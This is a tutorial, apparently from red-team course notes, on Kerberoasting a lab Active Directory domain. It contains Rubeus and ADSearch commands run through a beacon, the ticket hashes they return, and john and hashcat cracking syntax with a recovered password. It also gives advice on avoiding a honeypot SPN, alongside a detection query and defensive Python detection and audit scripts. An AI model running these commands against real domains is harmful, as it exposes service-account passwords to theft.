# Kerberoasting

Services run on a machine under the context of a user account. These accounts are either local to the machine (LocalSystem, LocalService, NetworkService) or are domain accounts (e.g. DOMAIN\mssql). A Service Principal Name (SPN) is a unique identifier of a service instance. SPNs are used with Kerberos to associate a service instance with a logon account, and are configured on the User Object in AD.

![](https://files.cdn.thinkific.com/file_uploads/584845/images/76f/0cf/9d9/spn.png)

Part of the TGS returned by the KDC is encrypted with a secret derived from the password of the user account running that service. Kerberoasting is a technique for requesting TGS tickets for services running under the context of domain accounts and cracking them offline to reveal their plaintext passwords. The Rubeus `kerberoast` command can be used to perform the attack. Running it without further arguments will roast every account in the domain that has an SPN (excluding krbtgt).

```
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /simple /nowrap

[*] Total kerberoastable users : 3

$krb5tgs$23$*mssql_svc$dev.cyberbotic.io$MSSQLSvc/sql-2.dev.cyberbotic.io:1433@dev.cyberbotic.io[...]
$krb5tgs$23$*squid_svc$dev.cyberbotic.io$HTTP/squid.dev.cyberbotic.io@dev.cyberbotic.io[...]
$krb5tgs$23$*honey_svc$dev.cyberbotic.io$HoneySvc/fake.dev.cyberbotic.io@dev.cyberbotic.io[...]
```

Even though Rubeus does not include the `krbtgt` account, it can [sometimes](https://twitter.com/_wald0/status/1361720293539139589) be cracked.

These hashes can be cracked offline to recover the plaintext passwords for the accounts. Use `--format=krb5tgs --wordlist=wordlist hashes` for john or `-a 0 -m 13100 hashes wordlist` for hashcat.

```
$ john --format=krb5tgs --wordlist=wordlist mssql_svc
Cyberb0tic       (mssql_svc$dev.cyberbotic.io)
```

I experienced some hash format incompatibility with john. Removing the SPN so it became: `$krb5tgs$23$*mssql_svc$dev.cyberbotic.io*$6A9E[blah]` seemed to address the issue.

**OPSEC**

By default, Rubeus will roast every account that has an SPN. Honey pot accounts can be configured with a "fake" SPN, which will generate a 4769 event when roasted. Since no legitimate client ever requests a ticket for this service, any such event is a high-fidelity indication of this attack.

```
event.code: 4769 and winlog.event_data.ServiceName: honey_svc
```
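
The query above catches the decoy only. The following added example (not part of the original notes) runs that rule over constructed 4769 events and pairs it with a second rule for one requester pulling RC4 tickets for several user-backed services in a short window; the requester names, threshold and window are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

HONEY_SERVICES = {"honey_svc"}   # decoy account from the query above
RC4_ETYPE = "0x17"               # etype 23, the "23" in the $krb5tgs$23$ hashes
BURST_THRESHOLD = 3              # assumed: distinct services per requester
WINDOW = timedelta(minutes=2)    # assumed sliding window

def ev(time, user, service, etype):
    return {"code": 4769, "time": time, "TargetUserName": user,
            "ServiceName": service, "TicketEncryptionType": etype}

# Constructed sample events, not real logs.
EVENTS = [
    ev("2022-08-16T09:00:01", "alice@DEV.CYBERBOTIC.IO", "SQL-2$", "0x12"),
    ev("2022-08-16T09:02:30", "alice@DEV.CYBERBOTIC.IO", "mssql_svc", "0x17"),
    ev("2022-08-16T09:05:10", "jdoe@DEV.CYBERBOTIC.IO", "mssql_svc", "0x17"),
    ev("2022-08-16T09:05:10", "jdoe@DEV.CYBERBOTIC.IO", "squid_svc", "0x17"),
    ev("2022-08-16T09:05:11", "jdoe@DEV.CYBERBOTIC.IO", "honey_svc", "0x17"),
]

def detect(events):
    """Return (rule, requester, detail) alerts for a list of 4769 events."""
    alerts = []
    recent = defaultdict(list)   # requester -> [(time, service)] RC4 requests
    for e in sorted(events, key=lambda x: x["time"]):
        if e["code"] != 4769:
            continue
        ts = datetime.fromisoformat(e["time"])
        who, svc = e["TargetUserName"], e["ServiceName"]
        # Rule 1: nothing legitimate ever asks for the decoy service.
        if svc.lower() in HONEY_SERVICES:
            alerts.append(("honey_spn", who, svc))
        # Rule 2 only counts RC4 tickets for user-backed services.
        if (e["TicketEncryptionType"].lower() != RC4_ETYPE
                or svc.endswith("$") or svc.lower() == "krbtgt"):
            continue
        window = [(t, s) for t, s in recent[who] if ts - t <= WINDOW]
        seen = {s for _, s in window}
        recent[who] = window + [(ts, svc)]
        # Fire once, when a new service pushes the count to the threshold.
        if svc not in seen and len(seen) + 1 == BURST_THRESHOLD:
            alerts.append(("rc4_burst", who, tuple(sorted(seen | {svc}))))
    return alerts

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

The second rule still fires when the decoy is skipped, provided enough other services are requested inside the window.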

A much safer approach is to enumerate possible candidates first and roast them selectively. This LDAP query will find domain users who have an SPN set.

```
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName

[*] TOTAL NUMBER OF SEARCH RESULTS: 4
	[+] cn                   : krbtgt
	[+] servicePrincipalName : kadmin/changepw
	[+] samaccountname       : krbtgt
	
	[+] cn                   : MS SQL Service
	[+] servicePrincipalName : MSSQLSvc/sql-2.dev.cyberbotic.io:1433
	[+] samaccountname       : mssql_svc
	
	[+] cn                   : Squid Proxy
	[+] servicePrincipalName : HTTP/squid.dev.cyberbotic.io
	[+] samaccountname       : squid_svc
	
	[+] cn                   : Honey Token
	[+] servicePrincipalName : HoneySvc/fake.dev.cyberbotic.io
	[+] samaccountname       : honey_svc
```

We can roast an individual account with the `/user` parameter.

```
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /user:mssql_svc /nowrap

[*] SamAccountName         : mssql_svc
[*] DistinguishedName      : CN=MS SQL Service,CN=Users,DC=dev,DC=cyberbotic,DC=io
[*] ServicePrincipalName   : MSSQLSvc/sql-2.dev.cyberbotic.io:1433
[*] PwdLastSet             : 8/15/2022 7:46:43 PM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash                   : $krb5tgs$23$*mssql_svc$dev.cyberbotic.io$MSSQLSvc/sql-2.dev.cyberbotic.io:1433@dev.cyberbotic.io[...]
```
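
The same SPN enumeration gives defenders the list of accounts to harden. This added example (not part of the original notes) rates constructed records by `msDS-SupportedEncryptionTypes` and password age; it assumes Rubeus's `RC4_HMAC_DEFAULT` corresponds to an unset attribute, and the age threshold and every value other than mssql_svc's `PwdLastSet` are invented.

```python
from datetime import date

RC4, AES128, AES256 = 0x4, 0x8, 0x10   # msDS-SupportedEncryptionTypes bits
MAX_PWD_AGE_DAYS = 365                 # assumed policy threshold
SKIP = {"krbtgt", "honey_svc"}         # built-in account and the known decoy

# Constructed records shaped like the search results above. etypes=None
# stands for an unset attribute (assumed meaning of RC4_HMAC_DEFAULT).
ACCOUNTS = [
    {"samAccountName": "krbtgt", "etypes": None, "pwdLastSet": date(2022, 3, 1)},
    {"samAccountName": "mssql_svc", "etypes": None, "pwdLastSet": date(2022, 8, 15)},
    {"samAccountName": "squid_svc", "etypes": RC4 | AES128 | AES256,
     "pwdLastSet": date(2023, 11, 1)},
    {"samAccountName": "honey_svc", "etypes": None, "pwdLastSet": date(2022, 3, 1)},
]

def assess(account, today):
    """Return the list of hardening findings for one SPN-bearing account."""
    findings = []
    etypes = account["etypes"]
    if not etypes:
        findings.append("rc4-default")      # nothing configured, RC4 usable
    elif etypes & RC4:
        findings.append("rc4-allowed")      # RC4 bit explicitly set
    elif not etypes & (AES128 | AES256):
        findings.append("no-aes")           # only legacy DES bits present
    if (today - account["pwdLastSet"]).days > MAX_PWD_AGE_DAYS:
        findings.append("stale-password")
    return findings

def audit(accounts, today):
    """Map each account with findings to its findings, skipping SKIP."""
    report = {}
    for account in accounts:
        name = account["samAccountName"]
        if name.lower() in SKIP:
            continue
        findings = assess(account, today)
        if findings:
            report[name] = findings
    return report

if __name__ == "__main__":
    # Constructed audit date.
    for name, findings in audit(ACCOUNTS, date(2024, 1, 10)).items():
        print(name, findings)
```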
